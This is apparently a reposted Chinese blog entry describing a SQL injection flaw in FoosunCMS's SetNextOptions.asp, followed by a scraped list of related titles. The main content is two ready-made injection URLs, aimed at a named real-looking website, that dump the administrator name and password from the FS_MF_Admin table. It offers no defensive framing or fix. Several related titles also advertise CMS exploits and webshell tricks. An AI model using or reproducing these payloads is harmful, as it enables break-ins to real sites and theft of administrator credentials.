风讯(FoosunCMS) SetNextOptions.asp注入漏洞利用
来源:互联网 发布:bt下载软件哪个快 编辑:程序博客网 时间:2024/05/21 15:04
风讯foosun的注册文件存在漏洞。
可以暴管理员帐号和密码。
漏洞文件:http://www.dj4now.com/user/SetNextOptions.asp
利用简单的方法:
暴管理员帐号:
复制代码http://www.dj4now.com/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1 ,admin_name,3,4,5,6,7,8
++from+FS_MF_Admin
暴管理员密码:
复制代码http://www.dj4now.com/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_pass_word,3,4,5,6,7,8
++from+FS_MF_Admin
- 风讯(FoosunCMS) SetNextOptions.asp注入漏洞利用
- 风讯注入漏洞0802_[setnextoptions.asp]
- fckeditor asp 漏洞利用
- ASP注入漏洞全接触
- ASP防注入漏洞方法
- ASP注入漏洞全接触
- ASP注入漏洞全接触
- ASP注入漏洞全接触
- ASP防注入漏洞方法
- ASP注入漏洞全接触
- SQL注入--ASP注入漏洞全接触
- SQL通用防注入系统asp版 插一句话漏洞利用
- 利用SQL注入漏洞登录后台
- 利用SQL注入漏洞登录后台
- 利用SQL注入漏洞登录后台
- 利用SQL注入漏洞登录后台
- DiscuzX2注入漏洞及XSS漏洞的利用
- 彻底解决asp注入漏洞的方法
- DedeCMS 支付页面注入漏洞
- 5UCMS漏洞利用
- 赋值运算符重载函数
- poj2240
- 杰奇小说连载系统任意文件上传0day
- 风讯(FoosunCMS) SetNextOptions.asp注入漏洞利用
- poj2240
- VPN隧道攻击
- ecshop支付漏洞手工注入 解决方案
- 程序员的生活
- 个人如何打破部门墙_做事要有霸气
- 2011-07-05|课改是个什么东西?
- SDcms后台拿webshell
- QSetting的用法